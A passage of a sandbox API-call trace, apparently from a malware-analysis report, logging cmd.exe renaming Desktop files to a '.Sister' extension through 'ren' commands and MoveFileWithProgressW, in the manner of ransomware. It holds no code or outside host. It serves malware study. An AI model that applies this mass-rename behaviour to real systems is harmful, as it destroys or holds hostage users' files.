returned 0x21ed8c70000 [0178.262] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66cc0) returned 0x5c [0178.263] malloc (_Size=0xffce) returned 0x21ed965fec0 [0178.263] ??_V@YAXPEAX@Z () returned 0x21ed965fec0 [0178.263] GetProcessHeap () returned 0x21ed8c70000 [0178.263] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64fe0 [0178.263] GetProcessHeap () returned 0x21ed8c70000 [0178.263] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9483740 [0178.263] _wcsicmp (_String1="sOzzAEtr.flv", _String2=".") returned 69 [0178.263] _wcsicmp (_String1="sOzzAEtr.flv", _String2="..") returned 69 [0178.263] GetFileAttributesW (lpFileName="sOzzAEtr.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\sozzaetr.flv")) returned 0x20 [0178.263] GetProcessHeap () returned 0x21ed8c70000 [0178.263] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9538ad0 [0178.265] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9538ae0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0178.265] SetErrorMode (uMode=0x0) returned 0x0 [0178.265] SetErrorMode (uMode=0x1) returned 0x0 [0178.265] GetFullPathNameW (in: lpFileName="sOzzAEtr.flv", nBufferLength=0x7fe7, lpBuffer=0x21ed965fec0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\sOzzAEtr.flv", lpFilePart=0xa6cf4fd660*="sOzzAEtr.flv") returned 0x24 [0178.265] SetErrorMode (uMode=0x0) returned 0x1 [0178.265] GetProcessHeap () returned 0x21ed8c70000 [0178.265] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed94839b0 [0178.265] _wcsicmp (_String1="sOzzAEtr.flv", _String2=".") returned 69 [0178.265] _wcsicmp (_String1="sOzzAEtr.flv", _String2="..") returned 69 [0178.265] GetFileAttributesW (lpFileName="sOzzAEtr.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\sozzaetr.flv")) returned 0x20 [0178.265] ??_V@YAXPEAX@Z () returned 0x1 [0178.265] malloc (_Size=0xffce) returned 0x21ed965fec0 [0178.265] ??_V@YAXPEAX@Z () returned 0x21ed965fec0 [0178.265] malloc (_Size=0xffce) returned 0x21ed966fea0 [0178.265] ??_V@YAXPEAX@Z () returned 0x21ed966fea0 [0178.266] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sOzzAEtr.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\sozzaetr.flv")) returned 0x20 [0178.266] malloc (_Size=0xffce) returned 0x21ed923fd00 [0178.266] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0178.266] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\sOzzAEtr.flv", fInfoLevelId=0x1, lpFindFileData=0x21ed9483750, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9483750) returned 0x21ed8d65040 [0178.266] malloc (_Size=0xffce) returned 0x21ed924fce0 [0178.266] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0178.266] ??_V@YAXPEAX@Z () returned 0x1 [0178.267] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\sOzzAEtr.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\sozzaetr.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\sOzzAEtr.flv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\sozzaetr.flv.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0178.272] FindNextFileW (in: hFindFile=0x21ed8d65040, lpFindFileData=0x21ed9483750 | out: lpFindFileData=0x21ed9483750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x211c8ad0, ftCreationTime.dwHighDateTime=0x1d5e77b, ftLastAccessTime.dwLowDateTime=0x10340cc0, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0x10340cc0, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0xe565, dwReserved0=0x0, dwReserved1=0x0, cFileName="sOzzAEtr.flv", cAlternateFileName="")) returned 0 [0178.274] GetLastError () returned 0x12 [0178.274] FindClose (in: hFindFile=0x21ed8d65040 | out: hFindFile=0x21ed8d65040) returned 1 [0178.274] ??_V@YAXPEAX@Z () returned 0x1 [0178.274] ??_V@YAXPEAX@Z () returned 0x1 [0178.274] ??_V@YAXPEAX@Z () returned 0x1 [0178.276] ??_V@YAXPEAX@Z () returned 0x1 [0178.276] GetProcessHeap () returned 0x21ed8c70000 [0178.276] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65040 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95ba0, Size=0x16) returned 0x21ed8c95940 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95940) returned 0x16 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed937b630 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937b630, Size=0xb2) returned 0x21ed937b630 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b630) returned 0xb2 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9548ac0 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9548ac0, Size=0x30) returned 0x21ed9548ac0 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9548ac0) returned 0x30 [0178.277] GetProcessHeap () returned 0x21ed8c70000 [0178.277] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9548b00 [0178.278] malloc (_Size=0x1ff9c) returned 0x21ed965fec0 [0178.280] GetProcessHeap () returned 0x21ed8c70000 [0178.280] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937e350 [0178.280] GetProcessHeap () returned 0x21ed8c70000 [0178.280] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c490 [0178.280] ??_V@YAXPEAX@Z () returned 0x1 [0178.281] malloc (_Size=0x1ff9c) returned 0x21ed965fec0 [0178.281] GetProcessHeap () returned 0x21ed8c70000 [0178.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d510 [0178.281] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed965fec0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0178.281] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d650a0 [0178.281] FindClose (in: hFindFile=0x21ed8d650a0 | out: hFindFile=0x21ed8d650a0) returned 1 [0178.281] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65100 [0178.281] FindClose (in: hFindFile=0x21ed8d65100 | out: hFindFile=0x21ed8d65100) returned 1 [0178.281] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x94dd368b, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x94dd368b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d651c0 [0178.281] FindClose (in: hFindFile=0x21ed8d651c0 | out: hFindFile=0x21ed8d651c0) returned 1 [0178.282] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x94dd368b, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x94dd368b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0178.282] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0178.282] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0178.284] GetProcessHeap () returned 0x21ed8c70000 [0178.284] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67230 [0178.284] ??_V@YAXPEAX@Z () returned 0x1 [0178.284] ??_V@YAXPEAX@Z () returned 0x1 [0178.284] GetProcessHeap () returned 0x21ed8c70000 [0178.284] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9548b00, Size=0x490) returned 0x21ed9548b00 [0178.284] GetProcessHeap () returned 0x21ed8c70000 [0178.284] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9548b00) returned 0x490 [0178.284] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0178.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.284] GetFileType (hFile=0x50) returned 0x2 [0178.284] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.284] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0178.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.287] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0178.328] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0178.328] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0178.333] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0178.333] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.333] GetFileType (hFile=0x50) returned 0x2 [0178.333] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.333] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0178.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.349] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0178.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.361] GetFileType (hFile=0x50) returned 0x2 [0178.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.361] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0178.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.372] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9548ad0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9548ad0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0178.383] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0178.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.384] GetFileType (hFile=0x50) returned 0x2 [0178.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.384] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0178.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.395] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0178.413] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0178.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.413] GetFileType (hFile=0x50) returned 0x2 [0178.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.414] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0178.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.426] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0178.441] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0178.455] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0178.455] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0178.455] malloc (_Size=0xffce) returned 0x21ed965fec0 [0178.455] ??_V@YAXPEAX@Z () returned 0x21ed965fec0 [0178.455] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0178.455] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0178.455] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0178.455] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0178.455] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0178.455] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0178.455] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0178.455] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0178.456] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0178.456] ??_V@YAXPEAX@Z () returned 0x1 [0178.456] GetProcessHeap () returned 0x21ed8c70000 [0178.456] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937b700 [0178.456] GetProcessHeap () returned 0x21ed8c70000 [0178.456] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937b700, Size=0x130) returned 0x21ed937b700 [0178.456] GetProcessHeap () returned 0x21ed8c70000 [0178.456] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b700) returned 0x130 [0178.456] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.456] malloc (_Size=0xffce) returned 0x21ed965fec0 [0178.456] ??_V@YAXPEAX@Z () returned 0x21ed965fec0 [0178.456] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.456] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed965fec0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0178.457] ??_V@YAXPEAX@Z () returned 0x1 [0178.457] GetProcessHeap () returned 0x21ed8c70000 [0178.457] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62590 [0178.458] GetProcessHeap () returned 0x21ed8c70000 [0178.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937bf80 [0178.458] GetProcessHeap () returned 0x21ed8c70000 [0178.458] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937bf80, Size=0x130) returned 0x21ed937bf80 [0178.458] GetProcessHeap () returned 0x21ed8c70000 [0178.458] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937bf80) returned 0x130 [0178.458] malloc (_Size=0xffce) returned 0x21ed965fec0 [0178.458] ??_V@YAXPEAX@Z () returned 0x21ed965fec0 [0178.458] GetProcessHeap () returned 0x21ed8c70000 [0178.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d650a0 [0178.458] GetProcessHeap () returned 0x21ed8c70000 [0178.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9483c20 [0178.458] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0178.458] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0178.458] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0178.458] GetLastError () returned 0x2 [0178.458] GetProcessHeap () returned 0x21ed8c70000 [0178.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9548fa0 [0178.458] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9548fb0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0178.458] SetErrorMode (uMode=0x0) returned 0x0 [0178.459] SetErrorMode (uMode=0x1) returned 0x0 [0178.459] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed965fec0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0178.459] SetErrorMode (uMode=0x0) returned 0x1 [0178.459] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0178.459] GetProcessHeap () returned 0x21ed8c70000 [0178.459] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9559c10 [0178.459] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0178.459] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0178.459] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0178.459] GetLastError () returned 0x2 [0178.459] ??_V@YAXPEAX@Z () returned 0x1 [0178.460] malloc (_Size=0xffce) returned 0x21ed965fec0 [0178.460] ??_V@YAXPEAX@Z () returned 0x21ed965fec0 [0178.460] malloc (_Size=0xffce) returned 0x21ed966fea0 [0178.460] ??_V@YAXPEAX@Z () returned 0x21ed966fea0 [0178.460] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0178.460] GetLastError () returned 0x2 [0178.460] _get_osfhandle (_FileHandle=2) returned 0x54 [0178.460] GetFileType (hFile=0x54) returned 0x2 [0178.460] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0178.460] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0178.468] _get_osfhandle (_FileHandle=2) returned 0x54 [0178.468] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0178.484] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0178.484] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0178.484] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0178.503] longjmp () [0178.503] ??_V@YAXPEAX@Z () returned 0x1 [0178.503] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe16fce60, ftCreationTime.dwHighDateTime=0x1d5ebd5, ftLastAccessTime.dwLowDateTime=0x77a4ab20, ftLastAccessTime.dwHighDateTime=0x1d5e227, ftLastWriteTime.dwLowDateTime=0x77a4ab20, ftLastWriteTime.dwHighDateTime=0x1d5e227, nFileSizeHigh=0x0, nFileSizeLow=0x27eb, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="t2RoafwhrVeC_4Hu.gif", cAlternateFileName="")) returned 1 [0178.503] GetProcessHeap () returned 0x21ed8c70000 [0178.503] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937bb70, Size=0x42c) returned 0x21ed955cfa0 [0178.504] GetProcessHeap () returned 0x21ed8c70000 [0178.504] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955cfa0) returned 0x42c [0178.504] GetProcessHeap () returned 0x21ed8c70000 [0178.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed955d3e0 [0178.504] GetProcessHeap () returned 0x21ed8c70000 [0178.504] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955d3e0, Size=0x30) returned 0x21ed955d3e0 [0178.504] GetProcessHeap () returned 0x21ed8c70000 [0178.504] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955d3e0) returned 0x30 [0178.504] GetProcessHeap () returned 0x21ed8c70000 [0178.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed955d420 [0178.505] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8d6ed10 [0178.506] ??_V@YAXPEAX@Z () returned 0x1 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955d420, Size=0x1c0) returned 0x21ed955d420 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955d420) returned 0x1c0 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed955d5f0 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955d5f0, Size=0x290) returned 0x21ed955d5f0 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955d5f0) returned 0x290 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed955d890 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955d890, Size=0x30) returned 0x21ed955d890 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955d890) returned 0x30 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, 